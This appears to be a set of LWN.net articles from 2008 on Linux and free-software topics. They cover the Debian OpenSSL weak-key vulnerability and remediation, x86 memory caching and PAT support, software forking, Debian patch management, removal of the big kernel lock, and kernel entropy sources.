		Debian vulnerability has widespread effects


The recent
Debian advisory for OpenSSL could lead to predictable cryptographic
keys being generated on affected systems.  Unfortunately, because of the
way keys are used, especially by ssh, this can lead to problems on
systems that never installed the vulnerable library.  In addition, because the
OpenSSL library is used in a wide variety
of services that require cryptography, a very large subset of security
tools are affected.  This is a wide-ranging vulnerability that affects
a substantial fraction of Linux systems.


For a look at the chain of errors that led to the vulnerability, see
our front page article.
Here, we will concentrate on some of the details of the code, the impact of
the vulnerability, and what to do about it.


An excellent tool for finding memory-related bugs, Valgrind was used on an application that
used the OpenSSL library.  It complained about the library using
uninitialized memory in two locations in crypto/rand/md_rand.c:

While the lines of code look remarkably similar (modulo the pre-processor
directive), their actual effect is very different.


The first is contained in the ssleay_rand_add() function, which is
normally called via the RAND_add() function.  It adds the contents
of the passed in buffer to the entropy pool of the pseudo-random number
generator (PRNG).  The other is contained in ssleay_rand_bytes(),
normally called via RAND_bytes(),
which is meant to return random bytes.  It adds the contents
of the passed in buffer—before filling it with random bytes to return—to the entropy pool as well.  The major difference
is that removing the latter might marginally reduce the entropy in the PRNG
pool, while removing the former effectively stops any entropy from being
added to the pool.


For both RAND_add() and RAND_bytes(), the buffer that
gets passed in may not have been initialized.  This was evidently known by
the OpenSSL folks, but remained undocumented for others to trip over
later.  The "#ifndef PURIFY" is a clue that someone, at some
point, tried to handle the same kind of problem that Valgrind was reporting
for the similar, but proprietary, Purify tool.  While it isn't necessarily
wrong to add these uninitialized buffers to the PRNG pool, it is
something that tools like Valgrind will rightly complain about.  Since it
is dubious whether it adds much in the way of entropy, while constituting a
serious hazard for uninitiated, some kind of documentation in the code
would seem mandatory. 


The major response from the OpenSSL team seems to be from core team member Ben Laurie's
weblog, where he has a rant entitled "Vendors Are
Bad For Security".  In it, and its follow-up, he makes some good points
about mistakes that were made, while seeming to be unwilling for OpenSSL to take any
share of the blame.


The end result is that OpenSSL would create predictable random numbers,
which would then result in predictable cryptographic keys.  According to
the advisory:

Affected keys include SSH keys, OpenVPN keys, DNSSEC keys, and key
material for use in X.509 certificates and session keys used in SSL/TLS
connections.  Keys generated with GnuPG or GNUTLS are not affected,
though.


A program
that can detect some weak keys has also been released.  It uses
256K hash values to detect the bad keys, which would imply 18-bits of
entropy in the PRNG pool of vulnerable OpenSSL libraries.  By using hashes
of the keys in the detection program, the authors do not directly give away the key
values that get generated, but it should not be difficult for an attacker
to generate and use that list.


For affected Debian-derived systems, the cleanup is relatively
straightforward, if painful.  The SSLkeys page on the Debian wiki
has specific information on how to remove weak keys along with how to
generate new ones for a variety of services affected.  Obviously, none of those steps should be taken until
the OpenSSL package itself has been upgraded to a version that fixes the hole.


A bigger problem may be for those installations based on distributions that
were not directly affected because they did not distribute the vulnerable
OpenSSL library.  Those machines may very well have weak keys installed in
user accounts as ssh authorized_keys.  A user who generated a key
pair on some vulnerable host may have copied the public key to a host that
was not vulnerable.  
This would allow an
attacker to access the account of that user by brute forcing the key from
the 256K possibilities.

Because of that danger, the
Debian project suspended
public key authentication on debian.org machines.  In addition, all
passwords were reset because of the possibility that an attacker could have
captured them by decrypting the ssh traffic using one of the weak keys.
One would guess that debian.org machines would have a higher incidence of
weak keys, but any host that allows users to use ssh public key
authentication is potentially at risk.


The weak key detector (dowkd) has some fairly serious limitations:

dowkd currently handles OpenSSH host and user keys and OpenVPN shared
secrets, as long as they use default key lengths and have been created
on a little-endian architecture (such as i386 or amd64).  Note that
the blacklist by dowkd may be incomplete; it is only intended as a
quick check.


In order to ensure that there are no weak keys installed as public keys on
other hosts, it may be necessary to remove all authorized_keys
(and/or authorized_keys2) entries for all users.  It may also be
wise to set all passwords to something unknown.  Until that is done, there
still remains a chance that a weak key may allow access to an attacker.  It
is a unpleasant task that needs to be done for those who administer a multi-user system.


		Getting a handle on caching


Memory management changes (for the x86 architecture) have caused surprises
for a few kernel developers.  As these issues have been worked out, it has
become clear that not everybody understands how memory caching works on
contemporary systems.  In an attempt to bring some clarity, Arjan van de
Ven wrote up some notes and sent them to your editor, who has now worked
them into this article.  Thanks to Arjan for putting this information
together - all the useful stuff found below came from him.


As readers of What every
programmer should know about memory will have learned, the caching
mechanisms used by contemporary processors are crucial to the performance
of the system.  Memory is slow; without caching, systems will run
much slower.  There are situations where caching is detrimental,
though, so the hardware must provide mechanisms which allow for control
over caching with specific ranges of memory.  With 2.6.26, Linux is
(rather belatedly) starting to catch up with the current state of the art
on x86 hardware; that, in turn, is bringing some changes to how caching is
managed.


It is good to start with a definition of the terms being used.  If a piece
of memory is cachable, that means:


 The processor is allowed to read that memory into its cache at 
     any time.  It may choose to do so regardless of whether the
     currently-executing program is interested in reading that memory.
     Reads of cachable memory can happen in response to speculative
     execution, explicit prefetching, or a number of other reasons.  The
     CPU can then hold the contents of this memory in its cache for an
     arbitrary period of time, subject only to an explicit request to
     release the cache line from elsewhere in the system.

 The CPU is allowed to write the contents of its cache back to memory
     at any time, again regardless of what any running program might choose
     to do.  Memory which has never been changed by the program might be
     rewritten, or writes done by a program may be held in the cache for an
     arbitrary period of time.  The CPU need not have read an entire cache
     line before writing that line back.


What this all means is that, if the processor sees a memory range as
cachable, it must be possible to (almost) entirely disconnect the
operations on the underlying device from what the program thinks it is
doing.  Cachable memory must always be readable without side effects.
Writes have to be idempotent (writing the same value to the same location
several times has the same effect as writing it once),
ordering-independent, and size-independent.  There must be no side effects
from writing back a value which was read from the same location.  In
practice, this means that what sits behind a cachable address range must be
normal memory - though there are some other cases.


If, instead, an address range is uncachable, every read and write
operation generated by software will go directly to the underlying device,
bypassing the CPU's caches.  The one exception is with writes to I/O memory
on a PCI bus; in this case, the PCI hardware is allowed to buffer and
combine write operations.  Writes are not reordered with reads, though,
which is why a read from I/O memory is often used in drivers for PCI
devices as a sort of write barrier.


A variant form of uncached access is write combining.  For read
operations, write-combined memory is the same as uncachable memory.  The
hardware is, however, allowed to buffer consecutive write operations and
execute them as a smaller series of larger I/O operations.  The main user
of this mode is video memory, which often sees sequential writes and which
offers significant performance improvements when those writes are
combined. 


The important thing is to use the right cache mode for each memory range.
Failure to make ordinary memory cachable can lead to terrible performance.
Enabling caching on I/O memory can cause strange hardware behavior,
corrupted data, and is probably implicated in global warming.  So the CPU
and the hardware behind a given address must agree on caching.


Traditionally, caching has been controlled with a CPU feature called
"memory type range registers," or MTRRs.  Each processor has a finite set
of MTRRs, each of which controls a range of the physical address space.
The BIOS sets up at least some of the MTRRs before booting the operating
system; some others may be available for tweaking later on.  But MTRRs are
somewhat inflexible, subject to the BIOS not being buggy, and are limited
in number.


In more recent times, CPU vendors have added a concept known as "page
attribute tables," or PAT.  PAT, essentially, is a set of bits stored in
the page table entries which control how the CPU does caching for each
page.  The PAT bits are more flexible and, since they live in the page
table entries, they are difficult to run out of.  They are also completely
under the control of the operating system instead of the BIOS.  The only
problem is that Linux doesn't support PAT on the x86 architecture, despite
the fact that the hardware has had this capability for some years.


The lack of PAT support is due to a few things, not the least of which has
been problematic support on the hardware side.  Processors have stabilized
over the years, though, to the point that it is possible to create a
reasonable whitelist of CPU families known to actually work with PAT.
There have also been challenges on the kernel side; when multiple page
table entries refer to the same physical page (a common occurrence), all of
the page table entries must use the same caching mode.  Even a brief window
with inconsistent caching can be enough to bring down the system.  But the
code on the kernel side has finally been worked into shape; as a
result, PAT support was merged for the 2.6.26 kernel.  Your editor is
typing this on a PAT-enabled system with no ill effects - so far.


On most systems, the BIOS will set MTRRs so that regular memory is cachable
and I/O memory is not.  The processor can then complicate the situation
with the PAT bits.  In general, when there is a conflict between the MTRR
and PAT settings, the setting with the lower level of caching prevails.
The one exception appears to be when one says "uncachable" and the other
enables write combining; in that case, write combining will be used.  So
the CPU, through the management of the PAT bits, can make a couple of
effective changes:


 Uncached memory can have write combining turned on.  As noted above,
     this mode is most useful for video memory.

 Normal memory can be made uncached.  This mode can also be useful for
     video memory; in this case, though, the memory involved is normal RAM
     which is also accessed by the video card.


Linux device drivers must map I/O memory before accessing it; the function
which performs this task is ioremap().  Traditionally,
ioremap() made no specific changes to the cachability of the
remapped range; it just took whatever the BIOS had set up.  In practice,
that meant that I/O memory would be uncachable, which is almost always what
the driver writer wanted.  There is a separate ioremap_nocache()
variant for cases where the author wants to be explicit, but use of that
interface has always been rare.

In 2.6.26, ioremap() was changed to map the memory uncached at all
times.  That created a couple of surprises in cases where, as it happens,
the memory range involved had been cachable before and that was what the
code needed.  As of 2.6.26, such code will break until the call is changed
to use the new ioremap_cache() interface instead.  There is also a
ioremap_wc() function for cases where a write-combined mapping is
needed. 

It is also possible to manipulate the PAT entries for an address range
explicitly:


These functions will set the given pages to uncachable, write-combining, or
writeback (cachable), respectively.  Needless to say, anybody using these
functions should have a firm grasp of exactly what they are doing or
unpleasant results are certain.

		The Freedom of Fork


One of the important rights that Free Software gives you is the ability
to take the source code of any software, modify it, and release it again
under a compatible Free Software license.
It is a very important freedom, as it allows not only users to
customize the software they use to better suit their requirements,
but also enables distributions to patch software to build in their
environment.  Environmental changes include new architectures and
different versions of system tools and libraries.
As with other important freedoms, this ability can prove to be a huge
problem if not handled properly.  There can be problems for
the original author, the person doing the fork, and the users of the
various versions of the software.


The story of Free Software is full of good examples of forks handled correctly,
like the EGCS
fork that transformed the GNU C Compiler into the 
GNU Compiler Collection (GCC),
or more recently the replacement of
Jörg Schilling's
cdrtools
with the cdrkit
package that is now found in most distributions.
Unfortunately, the list of bad examples is  longer.


Historically, forking a project was a difficult task for most single developers: handling version control repositories (especially with CVS)
was not something done easily.  It limited the task of forking to
experienced developers, who usually had enough common sense to know
when forking was not an option.


Nowadays, forking is much easier,
Subversion
allows to developers to easily fetch the whole history of a project.
Distributed version control systems (DVCS) like git, Mercurial,
Bazaar-NG and others remove the need for a central repository, making
forking and branching two very similar activities.
Recently, the GitHub hosting site
has made this action even more prominent by adding a "fork" button on the
pages for the repository hosted on their servers, allowing anybody to
create a new branch (or fork) of a project in a simple mouse click.

The Downsides of Forking

Forking is not always the best option. It should probably be considered
the last resort. Forking divides efforts
as the two projects often take slightly different turns.
The result of the fork is that the two versions of the code diverge, even
though they share the same interface and most
of the background logic.
This creates a series of problems, of a technical nature, that reflects
on the non-technical attributes of a program.


A forked project reuses a big part of the code from the original
project.  This causes code duplication, with its usual problems, and one
in particular: security risks. A forked project is usually
vulnerable to the problems the original project had, unless that part
of the code has been rewritten or modified with time.
As the forks evolve, authors often miss the security issues fixed by
their ancestor, making it harder for developers to track the issues down.


Another common problem is the division of users' contributions.
Users usually just report issues to one project, the one they use.
So either the developers of the two projects exchange information about
the bugs they fix in the common code, or the problems will likely be
ignored by one of the two projects, making the distance between the
projects increase.


You can find this very problem with software like
Ghostscript, the
omnipresent PostScript processor, used to generate, view and convert
PostScript files. Its development is currently divided into multiple
forks which do not always give their code back to the originating
project.
You can find one version released under the AFPL (Aladdin Free Public
License), one released under the GPL, a commercial/proprietary one,
and one version that used to be developed by Easy Software
Products, the authors of the CUPS printing system.


The reasons for the forks here were mostly related to licensing issues.
And, in the case of ESP, to better support CUPS.
In the end, the development of different bloodlines for the project
caused, and still causes, problems for distribution maintainers.
Distribution issues include keeping packages aligned, which means
doubling the effort needed to fix the code if it breaks or if it
doesn't follow policy.


Another case where dividing the development effort has caused problems
is in the universe of Logitech mouse control software.
The
lmctl
project was started as a tool to control some
settings of Logitech devices, like resolution and cordless channels.
The code has to know which devices have which settings available.
To do this, it keeps a table of USB identifiers.  As new devices started
appearing on the market, and Linux users started using them and the table
became outdated.
Distributions patched this up, but in different ways, creating
inconsistent tables. Some users started releasing their own modified
version of lmctl with an extended table to support different devices.


While explicit forks of entire projects have problems, the fact that
they delineate where they took the code from makes it easier to track
down the source of bugs and handle security vulnerabilities. On the
other hand, when a project borrows some code and imports it in its
source distribution, this kind of tracking becomes more difficult.
Free Software licenses explicitly allow, and  push for, importing code
between projects; cross-pollination also improves general code quality
over time.


For most distributions, an internal imported copy of a library inside
another project is also a violation of policy. For this reason the
developers will most likely try to make the project use a shared, external
copy of the code.
This works fine when the other library is simply bundled together
untouched, but it becomes a nuisance if there are subtle changes
which might not be apparent at a first impression.
One thing to take into account when you want to have an internal copy of
a library is to consider it as an untouchable piece of code.
instead of spending time fixing bugs inside that copy of the code, the
developers should try to fix the bugs in the original sources, so that
everybody (including themselves) can make use of the improvement.


In the real world, one example of this can be the
FFmpeg source code.
FFmpeg is imported by many different Free Software projects in the area
of multimedia: xine, MPlayer, GStreamer. While it is a very wide common ground for all these projects, as well for some others that aren't
importing a copy of it like VLC, some of the imports change the source
code, in more or less subtle ways. In the case of xine, the whole build
system is replaced to integrate it with the automake-based build system
used by the rest of the library.  Further patching is done to the
sources themselves so that they behave in a slightly different way than
the original. The code rots quickly and bugs that were already
fixed in the in-development sources of FFmpeg still sprout in xine-lib.


Maintaining such an import is a difficult and boring task, to the point
that the developers, in the past two years, have spent a lot of energy
toward the goal of not using an internal copy of FFmpeg anymore.
The result is that the difference between the original FFmpeg and the
internal copy is quite smaller, mostly limited to the build system.
Instead of advising against using an external copy of FFmpeg, it is
advised not to use the internal one. For the next minor version of
xine-lib, FFmpeg is being used pristine, entirely unpatched, and it will
probably not even be bundled with the library in the next future.

Successful Forks

Of course it's not all bad. There are successful forks in Free Software,
and many of them are now more famous than their parents. I've already named
the GNU Compiler Collection, which is the GCC that almost all Free Software
users have at hand at the moment.  Most people use GCC version 3
and later, which started as a fork of the other GCC (the GNU C Compiler), version 2. The original development of GCC was, like many other GNU projects, very closed to the community.


As Eric S. Raymond defined it in his book The Cathedral and the
Bazaar, it was a Cathedral-style development that often prepares the ground for forks, and this was no exception.  Multiple forks of the GCC
code were created. Their goals, while different, often didn't clash, but could have easily been worked on at the same time. Some of the forks were
then merged into the EGCS project, which eventually replaced the original
GCC.


Again citing GNU's Cathedral-style of development, it's difficult not to
talk about GNU Emacs
and its brother XEmacs.
Created originally to
support one particular product, the XEmacs project is nowadays a mostly
standalone project. XEmacs is kept at an arm's length from GNU Emacs,
mostly because of licensing and copyright assignment issues.
Neither version can be considered a superset of the other because they
both implement features in their own way.


Better is the state of
Claws Mail,
started as a different
branch of Sylpheed,
with the name Sylpheed Claws.  Originally the intention was
to develop new features that could one day find their way back to the
original code.  Claws Mail has since declared itself independent and
is now a stand-alone project. In this case, the exchange of code between the two projects has basically halted, as the code bases have diverged so
much that they retain very little in common.


In the case of the Ultima Online server emulators, forks became daily
events, and cross-pollination had grown to the point where at least five
projects were linked by family ties.
The UOX3 source code has been
forked, reused, imported and cut down so that it is present in WolfPack,
LoneWolf, NoX-Wizard and Hypnos.
Almost all of the UOX3 forks involved re-writing parts of the code,
as it had stratified to the point of not being maintainable.
The forks continued copying one from the other to make use of the best
features available.

Forking vs. Branching

There are a few good reasons why you might want to detach, temporarily,
from a given development track. Development of experimental features, new
interfaces, backend rewrites or resurrection of a project whose original authors are unavailable.
In most of these cases, forking is not the best solution but
branching most likely is. Although the border between these two
actions started slimming down thanks to distributed VCS, branching
usually doesn't involve setting up a new web page for the project,
changing its name or finding a new goal. And a branch is usually
related, tightly or not, to the original project.  Merges between
the two code bases often happen at more or less regular intervals,
and ideas and bug reports are shared.


Branches usually have the target of being merged in the main
development track, sooner for small, testing branches, or later for huge
rewrites. They don't usually require dividing of the efforts as the
problems affecting the main branch get their fixes propagated to the
other branches when they merge back the original code.


One common problem with developing through branches involved bad support
in the Subversion version control system. In Subversion the branches are
represented as a different path in the repository, with almost no help
for branches in the merge operations.
With a modern distributed VCS, branches are so cheap that
any checkout is, from some points of view, a different branch, and the
merge operations are one of the main focuses.
Projects like the Linux kernel or xine-lib rely heavily on an
above-average number of branches.  These are often short-lived and
used for testing purposes.

Looking to the Future

Forks will never end in Free Software as they are supported by one of
the freedoms that make Free Software what we all want it to be.
The future will, of course, bring new forks.
Recently there has been a lot of talk about
Funpidgin,
a fork of the widespread Pidgin Instant Messaging client (formerly Gaim).
Again it seems like it was the Cathedral-style development of the original
code that motivated a fork that could give (some of) the users what
they wanted.


And even though GNU Emacs opened its process quite a lot, its forks
haven't stopped sprouting.  This is despite the fact that
Richard Stallman, original author and mastermind behind the GNU project,
stepped down as maintainer, putting in place Stefan Monnier and Chong Yidong.
The Aquamacs Emacs is still diverging from the original GNU
Emacs for supporting Apple's Mac OS X, while different versions
are being developed to support the multiple user interfaces one can use
on that operating system. Similarly, although the Windows port of Emacs
is already pretty solid, there are extensions being written to make it
easier for users to adapt it to the Microsoft environment.


Forks are usually the effect of a closed-circle development, a Cathedral,
where some of the developers or users can't see their objective being
fulfilled, will all their energy being poured in. So just look for the
projects that don't seem to be getting much love from a community, and
you might find a fork starting to make its first leaves.


Then there is the
Poppler project,
which merged together the modified versions of the XPDF code imported by
projects like GNOME and KDE for their PDF viewers.
Poppler is soon going to be a nearly omnipresent PDF viewer on Free
Software desktops and beyond.
This summer's milestone KDE 4.1 release will include the release of
the new oKular document viewer, oKular will use Poppler for PDF rendering
on the (stable) KDE users' desktops.

Conclusions

I'd suggest that anybody thinking about creating a fork should think
twice. Forking is rarely a good choice, better choices can be
branching, or if you need just part of a code, working together like
Poppler developers did to separate the code to share the common parts.


When you want to make some changes to a software project, propose
branching it, show the results to the original developers and discuss
with them on how to improve the code. Most of the times you'll find
authors are open to the changes.


A fork is a grave matter.  It might bring innovation to the Free Software
community, but it could also separate developers that could otherwise
work together, maybe in a better way.  In this light, GitHub's one click
forking capability seems like a dangerous feature.


The ever-increasing ease of forking everything, from small projects
to part of, or even entire distributions (think about Debian's
repositories and Gentoo's overlays) is increasing the fragmentation of
Free Software projects.  Biodiversity in software can be a very good
thing, just like in nature, but people should first try their best to
work together, rather than one against the other.


		Debian contemplates patch management


Developers in the Debian project had a busy week cleaning up after the
openssl vulnerability was disclosed.  Once that was taken care of, they
moved on to process-related issues.  Clearly, some shortcomings in how
Debian handles patches to the programs it ships have been revealed; now the
project would like to face those problems and make things work better in
the future.  The resulting discussion shows Debian at its introspective
best, and may well have results that other distributors will want to pay
attention to.  As a Fedora developer noted:
"This bug could easily have been us on the receiving end."
All distributors make changes to their packages, so all of them are
potentially exposed to this kind of failure.


Debian's packaging policy resembles that of most other distributions.  A
Debian source package is supposed to contain a tarball of the upstream
source distribution, without changes.  Any distribution-specific patches
are included separately and applied when the source package is prepared for
building.  There are couple of Debian-specific issues to be faced, though:


 From the discussion, it seems that the "pristine upstream
     tarball" rule is occasionally bent by developers.  Sometimes there is
     no alternative: some upstream source distributions contain material
     which, due to its licensing, cannot be shipped by Debian.  The
     justification for other cases is not always quite as clear.

 Debian's patches are all mashed together and included as a single diff
     file.  So there is no metadata describing the patches, and they are
     difficult to separate from each other.  In this regard, Debian differs
     from RPM-based distributions, which generally keep each patch separate.


The end result of all this is that Debian's patches are hard for others to
review, hard for upstream projects to consider, and even hard for other
Debian developers to get a handle on.

Raphaël Hertzog started a discussion
on how to improve this situation.  A key part of his approach (and an idea
which others have been pursuing as well) is to make changes to the Debian
source package format which would make the nature of each patch explicit.
At a minimum, packagers would include a debian/patches directory
with the source; that directory would contain each patch, broken out into a
separate file.  Some Debian packages are built this way already, though the
practice is far from universal.

Beyond that, though, it would be nice to have the source package itself
understand the patch stream and its associated metadata.  There are a few
proposals for this; Raphaël favors the "3.0 (quilt)" format, which
keeps the patches (in a separate tarball) as a quilt series.  This format
seems to have a certain amount of support; among other things, its
simplicity would make it easy for Debian developers to create packages in
this format without having to learn new tools.  The quilt series file -
like the spec file used with RPM packages - makes it clear which patches
must be applied, and in which order.


There are other variants of the 3.0 source package format, though.  The
"3.0 (git)" format contains a git repository containing the
upstream source and a series of patches to it.  This approach has the
advantage of including the history of the patches along with the other
metadata; it could also, arguably, make it easier for other distributors
(and upstream) to cherry-pick patches of interest.  On the other hand, a
git-based package format requires the availability of git and has the
potential to make those packages larger.  The GitSrc FAQ has some more
information on this format; there's also a "3.0 (bzr)" format
variant out there.


Any of these new formats, if widely adopted, would bring a new level of
transparency to Debian's patching activities.  It would enable the creation
of a "patches.debian.org" site (clearly inspired by patches.ubuntu.com) where anybody
could quickly look at the changes which have been made to any given
package.  There are some developers who doubt the utility of this; they
worry that upstream developers won't want to poll a site to see what
changes have been made to their code.  One developer at least (GNOME hacker
Vincent Untz) thinks that a
patches.debian.org site would be a step in the right direction, though.


Another quibble which has been heard is that Debian does not need any new
infrastructure for patch management.  The right place for patch tracking,
it is said, is with the upstream project.  Nobody seems to challenge the
claim that more patches need to go back upstream, but there is also the
fact that quite a few patches will never get there.  The upstream
developers for a number of projects seem to have different goals and are
seen by the distribution maintainers as being overtly uncooperative.  And
some patches - such as those removing non-free material - may not be
something that even cooperative upstream maintainers want.  So there will
always be a need for distribution-specific patches; the "track it upstream"
approach will not solve the whole problem.


Meanwhile, Joey Hess brought a completely different
idea to the discussion: just treat every divergence from upstream as a
bug.  Each patch would have a corresponding entry in the Debian bug
tracking system (BTS) with a special tag.  Anybody could then query the
list of outstanding bugs, view the patches, and participate in the
associated discussion.  Using the BTS brings some real technical
advantages, in that the system already exists.  But, Joey says, the real benefit is elsewhere:


	The biggest reason for using the BTS is not technical. It's that,
	if we decide that the project will treat divergence from upstream
	as a bug, then we've effectively decided that maintainers will be
	responsible for both minimising unnecessary divergence,
	communicating about it to upstream, and for keeping track of what
	divergence exists. Because developers are responsible for their
	bugs.


A separate patch tracking mechanism, instead, would be a mostly automatic
subsystem on the side which might not bring the same sort of pressure to
bear on developers.

The BTS approach is not universally acclaimed either.  Some developers
claim that most Debian-specific patches are not really Debian bugs - they
are, instead, upstream bugs.  Regardless of whether that is really true,
distribution bug trackers generally carry a great many entries which, in
the end, describe bugs in upstream packages.  Another complaint is that
creating and maintaining BTS entries would be just another bit of
bureaucratic work imposed on Debian developers.  Beyond any doubt, some
developers would see it that way.


But this may be a place where a bit more bureaucracy makes some sense.  The
Linux distributors of the world (certainly not just Debian) are carrying
thousands of patches against the free programs they distribute.  Making the
nature and extent of those patches more readily apparent can only be
beneficial for users, reviewers, distributors, and upstream maintainers.  
One clear conclusion from recent events is that all distributors could do
more to let the rest of the community know about the changes they are making.


A distributor's ability to patch a program is a crucial part of the whole
ecosystem - it's the distributors' way of balancing their users' needs
against the upstream maintainer's policies.  But distributors should be
clear about the changes they are making, willing to merge those changes
upstream whenever possible, and wanting feedback on those patches.  Any
"bureaucracy" which helps to make that happen can only help our community
as a whole in ways that go far beyond the avoidance of another openssl
disaster.


One final note: the existence of source package formats which incorporate
distributed version control system repositories shows that developers have
been thinking about this problem for a while; it's not just a response to
recent events.  There is an effort underway to think about what the
intersection of version control and packaging can really achieve for all
distributors; the folks working on this project can be found at vcs-pkg.org.  They are working on organizing
a gathering this
September in Extremadura.  Vcs-pkg is worth watching; it has the
potential to make things work better for developers and users of all
distributions.

		Kill BKL Vol. 2


Last week's big kernel lock
article discussed a BKL-related performance regression and concluded
that we would likely see a new interest in its elimination.  In the
intervening week, that interest has indeed come to the fore.  There are now
a couple of different efforts afoot to get rid of this long-lasting lock.


One might well wonder why the BKL is so persistent.  Over the last
(approximately) fifteen years, thousands of locks have been added to the
kernel, pushing the BKL into increasingly obscure corners.  But there are a
lot of those corners, including a great many explicit
lock_kernel() calls, the open() method for every char
device, most ioctl() implementations, all fasync()
implementations, and more.  The BKL can be found throughout the kernel, and
doesn't appear ready to go without a fight.


Part of the problem is simply that locking is hard.  So going in and
changing the locking of some crufty, old driver is not at the top of the
list for a lot of developers, who would generally rather be creating crufty
new drivers.  Beyond that, though, the BKL is special.  It was originally
created to be more than just a locking primitive; its purpose is to allow
BKL-covered code to pretend that it is still running on an old,
uniprocessor system.  So its semantics are very different from any other
lock in the Linux kernel.  

For example, the BKL nests, so programmers can add lock_kernel()
calls anywhere without worrying about whether the BKL might already have
been acquired elsewhere.  As with a mutex, code holding the BKL can sleep;
however, the scheduler will magically release the BKL until the holding
thread wakes up again.  So there can be various threads in kernel space,
all of which think they hold the BKL, but only one of them will actually be
running at any given time.  The end result is that it is hard to get a
handle on what is happening with the BKL at any given time; code can depend
on it without ever really being aware of its existence.

As Ingo Molnar put it in his kill
the BKL tree announcement:


	Furthermore, the BKL is not covered by lockdep, so its dependencies
	are largely unknown and invisible, and it is all lost in the haze
	of the past ~15 years of code changes. All this has built up to a
	kind of Fear, Uncertainty and Doubt about the BKL: nobody really
	knows it, nobody really dares to touch it and code can break
	silently and subtly if BKL locking is wrong.


That doesn't mean that people aren't willing to try; Ingo's tree - to which
we will return shortly - is a major
effort in that direction.  But first,
consider another initiative which, somewhat accidentally, turned up an
example of just how subtle BKL-related issues can be.  As was mentioned
above, the kernel grabs the BKL whenever a process opens a char device; the
BKL is held while the associated driver's open() function runs.
To eliminate BKL, one must remove this particular use of it; one cannot
just take it out, however, without breaking every driver which does not
have proper locking internally.  So, in fact, this lock_kernel()
call cannot be removed until every driver's open() function has
been audited and, if necessary, fixed.  That's a big flag day.


An alternative, which your editor rashly jumped into doing, is to push the
acquisition of the BKL down one level.  Every open() function is
forced to be correct through the addition of explicit
lock_kernel() and unlock_kernel() calls; once all of the
in-tree drivers have been fixed in this way, the higher-level call in
chrdev_open() can be removed.  This work may seem like a step
backward, in that it replaces a single lock_kernel() call with
approximately 100 others.  But it's actually a big step forward, in that
each driver can now be audited and fixed independently.  This work has now
been done, the resulting tree is in linux-next, and, if all goes well, it
should be ready for 2.6.27.


While doing this work, though, your editor noticed quite a few drivers with
open functions that were either completely empty (all they do is
"return 0") or they do something relatively trivial.  These
functions, one would think, do not need to acquire the BKL; they touch no
global resources and cannot possibly race with any other part of the
kernel.  In fact, as was suggested by others, the empty open()
functions could just be removed altogether.


It was Alan Cox who pointed out that life
is not quite so simple.  Under the current regime, an open function which
looks like this:


is really better modeled as this:


These two may seem the same, but there is a crucial difference: in the
second form, empty_open() will not return until it can acquire the
BKL.  In other words, after empty_open() runs, one knows that the BKL became available
at least once.  And this matters: a classic device driver error is to
(1) register a device with the kernel, then (2) initialize all of
the internal data structures needed to manage that device.  Should some
other process attempt to open and use the device between those two steps,
unpleasant things can happen.  The lock_kernel() call in the
open() function, despite protecting no critical section directly,
serializes the opening of the device with the driver's initialization, and
thus prevents mayhem.  So, says Alan,


	I think it would be best to make them lock/unlock kernel in the
	first pass and then work through them. The BKL can be subtle and
	evil, but as I brought it into the world I guess I must banish it
	;)


Alan will not be alone in that effort, though, and Ingo Molnar's "kill the
BKL" tree is likely to help this work considerably.  Ingo's approach is to
get rid of most of the features which make the BKL special.  So, with his
patches, the BKL becomes just another mutex which, crucially, can be
tracked with the lock
validator.  It is no longer released when a thread calls
schedule(), a change which forced the addition of a few explicit
"release, schedule, and reacquire" changes in code which would otherwise
deadlock.  There's a number of warnings added to point out calls made
holding the BKL which should not be.  And so on.

This patch set, in essence, removes the BKL entirely, replacing it with
just another big lock which happens to do nesting.  And the nesting might
go too at some point.  So the BKL becomes more visible and easier to
understand.  And, presumably, easier to eliminate.

Linus likes this approach, though he would
like to see it reworked to the point that it can be merged into the
mainline relatively soon.  Doing that would require putting most of the
changes behind a configuration option decorated with a sufficient number of
scary warnings; then people who wanted to test this code could turn it on
and see what explodes.  The number of explosions would probably be
relatively small - but probably not zero.

This set of changes, along with the other work being done, suggests that
significant progress toward the elimination of the BKL can be expected over
the next few kernel development cycles.  Once it's gone, we'll have a
kernel without legacy locking issues, and without the unpleasant
performance issues that the BKL can bring.  That will still take a while,
though; there is simply no substitute for actually looking at all the
BKL-covered code and ensuring that it will run safely in the absence of
that protection.  It's a painstaking job requiring moderate skills which
can only be rushed so much.

		Appropriate sources of entropy


A steady stream of random events allows the kernel to
keep its entropy pool stocked up, which in turn allows processes to use the
strongest random numbers that Linux can provide.  Exactly which events
qualify as random—and just how much randomness they
provide—is sometimes difficult to decide.  A recent move to eliminate
a source of
contributions to the entropy pool has worried some, especially in the embedded
community. 


The kernel samples unpredictable events for use in generating random
numbers, storing that data in the entropy pool.  Entropy is a measure of
the unpredictability or randomness of a data set, so the kernel estimates
the amount of entropy each of those events contributes to the pool.
Many kernels run on hardware that is lacking some of the
traditional sources of entropy. In those cases, the timing of interrupts
from network 
devices has been used as a source of entropy, but it has always been
controversial, so it was recently proposed for removal.


Two of the best sources of random data for the entropy pool—user interaction via a
keyboard or mouse and disk interrupts—are often not present in embedded
devices.  In addition, some disk interfaces, notably ATA, do not add
entropy, which extends the problem to many "headless" servers.  But network
interrupts are seen as a dubious source of entropy because they may be able
to be observed, or manipulated, by an attacker.  In addition, as network
traffic rises, many network drivers turn off receive interrupts from the
hardware, allowing the kernel to poll periodically for incoming packets.
This would reduce entropy collection just at the time when it might be needed for
encrypting the traffic. 


This is not the first time eliminating the IRQF_SAMPLE_RANDOM flag
from network drivers has come up; we looked at the issue two years
ago (though the flag was called SA_SAMPLE_RANDOM at that time).
It has come up again, starting with a  query on linux-kernel from
Chris Peterson: "Should network devices be allowed to contribute
entropy to /dev/random?"  Jeff Garzik, kernel network device driver
maintainer, answered: "I tend to push people to /not/ add
IRQF_SAMPLE_RANDOM to new drivers, 
but I'm not interested in going on a pogrom with existing code."


For anyone that is interested in such a pogrom, Peterson proposed a
patch to 
eliminate the flag from the twelve network drivers that still use it.
This sparked a long discussion on how to provide entropy for those devices
that do not have anything else to use.  While the actual contribution of
entropy from network devices is questionable, mixing that data into the
pool does not harm it, as long as no entropy credit—the current
estimate of entropy in the pool—is awarded.
Alan Cox proposed a new flag to track sources
like that:

A more interesting alternative might be to mark things like network
drivers with a new flag say IRQF_SAMPLE_DUBIOUS so that users can be
given a switch to enable/disable their use depending upon the environment.


Some were in favor of an approach like this, but Adrian Bunk notes that: 

If he can live with dubious data he can simply use /dev/urandom .

If a customer wants to use /dev/random and demands to get dubious data
there if nothing better is available fulfilling his wish only moves
the security bug from his crappy application to the Linux kernel.


